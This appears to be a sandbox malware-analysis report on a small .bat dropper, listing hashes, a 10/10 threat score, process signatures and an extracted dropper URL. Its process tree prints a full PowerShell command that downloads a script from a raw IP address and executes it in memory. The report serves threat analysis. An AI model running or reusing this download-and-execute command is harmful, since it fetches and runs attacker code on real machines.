de741f43e0b638ccbfadfc41f6e82f8fd2c5b39d4f9f38469affb4d4960487b5 | Triage

Analysis

max time kernel
133s
max time network
68s
platform
windows10_x64
resource
win10v200430
submitted
21-05-2020 18:10

Sharing

Report Analysis Logs

General

Target

328013aa2b767f95491e4d8e9372cc46.bat
Size

219B
MD5

8da3de41f693d26688864e6e24e5c4f0
SHA1

229f10d9481ea1c89a085e76365149ca34ca4614
SHA256

de741f43e0b638ccbfadfc41f6e82f8fd2c5b39d4f9f38469affb4d4960487b5
SHA512

70d2cb7f7cb47c2b9111d548b4f405ea7b5e95ced055d64e25190200487e174f36f2fe86aaa86c4778c2f6f3c8d10e05ba6a55b808437b2d180a4cee67240386

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/328013aa2b767f95491e4d8e9372cc46

Signatures

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2132 1572 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 2132 WerFault.exe
Token: SeBackupPrivilege 2132 WerFault.exe
Token: SeDebugPrivilege 2132 WerFault.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

WerFault.exe

pid	process
2132	WerFault.exe
2132	WerFault.exe
2132	WerFault.exe
2132	WerFault.exe
2132	WerFault.exe
2132	WerFault.exe
2132	WerFault.exe
2132	WerFault.exe
2132	WerFault.exe
2132	WerFault.exe
2132	WerFault.exe
2132	WerFault.exe
2132	WerFault.exe
2132	WerFault.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\328013aa2b767f95491e4d8e9372cc46.bat"
1⤵
PID:1300

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/328013aa2b767f95491e4d8e9372cc46');Invoke-AATPTEWMZPXK;Start-Sleep -s 10000"
2⤵
PID:1572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 704
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2132

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2132-0-0x0000000004D10000-0x0000000004D11000-memory.dmp

Filesize
4KB

Download
memory/2132-1-0x0000000005340000-0x0000000005341000-memory.dmp

Filesize
4KB

Download